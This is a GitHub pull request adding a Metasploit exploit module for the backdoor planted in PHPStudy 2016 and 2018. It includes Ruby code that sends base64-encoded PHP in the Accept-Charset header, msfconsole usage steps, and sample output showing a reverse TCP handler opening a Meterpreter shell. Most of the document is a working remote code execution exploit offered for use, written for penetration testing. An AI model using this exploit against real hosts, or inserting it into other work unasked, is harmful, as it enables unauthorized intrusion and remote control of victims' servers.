### PR TITLE
Add phpstudy backdoor exploit module

### DIFF
--- a/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md
+++ b/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md
@@ -1,0 +1,30 @@
+## Description
+
+PHPStudy is free software, it is a one-click installation software, which includes PHP, MySQL, Apache and more. At some point in time, hackers were able to hack into phpStudy and tamper on 2016 and 2018 versions of the software to make it vulnerable to this specific exploit.
+
+## Vulnerable Application
+
+The vulnerability exists in php-5.4.45 and php-5.2.17 service versions in PHPStudy2016 and PHPStudy2018
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do:```use exploit/multi/http/phpstudy_backdoor_rce``` 
+3. Do:```set rhosts <target>```
+4. Do:```run```
+
+If your target is vulnerable, you will get a shell. 
+you should see an output similar to the following
+
+```
+msf5 exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104
+rhosts => 192.168.56.104
+msf5 exploit(multi/http/phpstudy_backdoor_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Sending shellcode
+[*] Sending stage (38288 bytes) to 192.168.56.104
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:49169) at 2020-02-23 10:11:40 +0800
+
+meterpreter > 
+```

--- a/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
+++ b/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
@@ -1,0 +1,67 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Phpstudy Backdoor Remote Code execution",
+      'Description'    => %q{
+        This module can detect and exploit the backdoor of PHPStudy.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Airevan' ],
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['PHPStudy 2016-2018', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 20 2019",
+      'DefaultTarget'  => 0
+    ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path', '/'])
+        ])
+  end
+
+
+  def check
+    uri = target_uri.path
+    res = send_request_cgi({
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(uri),
+      'headers' =>  {
+        'Accept-Encoding' =>  'gzip,deflate',
+        'Accept-Charset'  =>  'ZWNobyAndnVsbmVyYWJsZSc7Cg=='
+      }
+    })
+
+    if res && res.code == 200 && res.body == 'vulnerable'
+      #print_good(res.body)
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+          
+  end
+
+  def exploit 
+    uri = target_uri.path
+    payload_encoded = Rex::Text.rand_text_alpha(0)
+    payload_encoded << payload.encoded
+    shellcode = Rex::Text.encode_base64(payload_encoded)
+    print_good("Sending shellcode")
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(uri),
+      'headers' => {
+          'Accept-Encoding' => 'gzip,deflate',
+          'Accept-Charset'  => shellcode
+      }
+    }) 
+  end
+end

--- a/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
+++ b/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
@@ -10,30 +10,36 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Phpstudy Backdoor Remote Code execution",
+      'Name'           => "PHPStudy Backdoor Remote Code execution",
       'Description'    => %q{
         This module can detect and exploit the backdoor of PHPStudy.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'Airevan' ],
+      'Author'         => 
+        [
+          'Dimensional',  #POC
+          'Airevan'       #Metasploit Module
+        ],
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
           ['PHPStudy 2016-2018', {}]
         ],
+      'References'    =>
+        [
+          ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
+        ],
       'Privileged'     => false,
       'DisclosureDate' => "Sep 20 2019",
       'DefaultTarget'  => 0
     ))
 
-      register_options(
-        [
-          OptString.new('TARGETURI', [true, 'The base path', '/'])
-        ])
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/'])
+      ])
   end
-
-
   def check
     uri = target_uri.path
     fingerprint = Rex::Text.rand_text_alpha(8)
@@ -50,10 +56,8 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Safe
-    end
-          
+    end       
   end
-
   def exploit 
     uri = target_uri.path
     print_good("Sending shellcode")
@@ -64,6 +68,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'Accept-Encoding' => 'gzip,deflate',
           'Accept-Charset'  => Rex::Text.encode_base64(payload.encoded)
       }
-    }) 
+  })
   end
 end

--- a/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
+++ b/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
         This module can detect and exploit the backdoor of PHPStudy.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => 
+      'Author'         =>
         [
           'Dimensional',  #POC
           'Airevan'       #Metasploit Module

--- a/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
+++ b/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
@@ -1,3 +1,8 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -31,17 +36,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     uri = target_uri.path
+    fingerprint = Rex::Text.rand_text_alpha(8)
     res = send_request_cgi({
       'method'  =>  'GET',
       'uri'     =>  normalize_uri(uri),
       'headers' =>  {
         'Accept-Encoding' =>  'gzip,deflate',
-        'Accept-Charset'  =>  'ZWNobyAndnVsbmVyYWJsZSc7Cg=='
+        'Accept-Charset'  =>  Rex::Text.encode_base64("echo '#{fingerprint}';")
       }
     })
 
-    if res && res.code == 200 && res.body == 'vulnerable'
-      #print_good(res.body)
+    if res && res.code == 200 && res.body.to_s.include?(fingerprint)
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Safe
@@ -51,16 +56,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit 
     uri = target_uri.path
-    payload_encoded = Rex::Text.rand_text_alpha(0)
-    payload_encoded << payload.encoded
-    shellcode = Rex::Text.encode_base64(payload_encoded)
     print_good("Sending shellcode")
     res = send_request_cgi({
       'method'  => 'GET',
       'uri'     => normalize_uri(uri),
       'headers' => {
           'Accept-Encoding' => 'gzip,deflate',
-          'Accept-Charset'  => shellcode
+          'Accept-Charset'  => Rex::Text.encode_base64(payload.encoded)
       }
     }) 
   end

--- a/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
+++ b/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
@@ -56,9 +56,9 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Safe
-    end       
+    end
   end
-  def exploit 
+  def exploit
     uri = target_uri.path
     print_good("Sending shellcode")
     res = send_request_cgi({

--- a/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
+++ b/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fingerprint = Rex::Text.rand_text_alpha(8)
     res = send_request_cgi({
       'method'  =>  'GET',
-      'uri'     =>  normalize_uri(uri),
+      'uri'     =>  normalize_uri(uri, 'index.php'),
       'headers' =>  {
         'Accept-Encoding' =>  'gzip,deflate',
         'Accept-Charset'  =>  Rex::Text.encode_base64("echo '#{fingerprint}';")
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Sending shellcode")
     res = send_request_cgi({
       'method'  => 'GET',
-      'uri'     => normalize_uri(uri),
+      'uri'     => normalize_uri(uri, 'index.php'),
       'headers' => {
           'Accept-Encoding' => 'gzip,deflate',
           'Accept-Charset'  => Rex::Text.encode_base64(payload.encoded)


### PR DESCRIPTION
Supported versions that are affected are PHPStudy2016 and PHPStudy2018.

Neet to switch service version to php-5.4.45 + Apache

![image](https://user-images.githubusercontent.com/26640179/75092059-15b45900-55af-11ea-8673-d02449d43067.png)




## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/phpstudy_backdoor_rce`
- [ ] `set rhosts 192.168.56.104`
- [ ] `check`or `run`

## POC

![image](https://user-images.githubusercontent.com/26640179/75941421-95ed8f00-5eca-11ea-8853-76be4d6a71f9.png)